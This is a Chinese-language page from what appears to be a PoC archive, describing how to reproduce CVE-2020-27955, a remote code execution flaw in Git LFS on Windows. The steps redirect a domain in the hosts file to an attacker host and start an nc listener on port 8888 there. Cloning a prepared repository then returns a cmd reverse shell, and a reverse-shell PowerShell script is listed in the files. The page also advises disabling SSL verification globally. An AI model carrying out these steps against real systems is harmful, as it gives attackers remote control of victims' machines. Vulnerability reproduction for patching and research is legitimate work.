POC详情: e1a39628495c645364a6dc6f2ef552b040d3cb0e

来源
关联漏洞
标题: Git Lfs代码问题漏洞 (CVE-2020-27955)
描述:Git Lfs是Git Lfs团队的一个用于git项目中处理大文件的命令行工具。 Git LFS 2.12.0版本存在代码问题漏洞,该漏洞可造成远程代码执行的危害。
介绍
# CVE-2020-27955漏洞复现

1、win机下载有漏洞的版本Git-LFS

下载地址:https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

2、win机安装,添加如下信息host文件,10.1.1.5即是nc监听8888的主机(可自行替换)

10.1.1.5  abcall.xyz

3、10.1.1.5主机,nc启监听口8888

┌──(root㉿hostname)-[~]

└─# nc

Cmd line: -l -p 8888

4、win机cmd命令行输入

git clone https://github.com/z50913/CVE-2020-27955.git

5、10.1.1.5获得win机cmd的shell

#其他
如报ssl证书问题可先输入以下命令,屏蔽ssl验证,再重新clone

git config --global http.sslverify false
文件快照

[4.0K] /data/pocs/e1a39628495c645364a6dc6f2ef552b040d3cb0e ├── [ 648] README.md └── [ 500] revsh_powersh.ps1 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。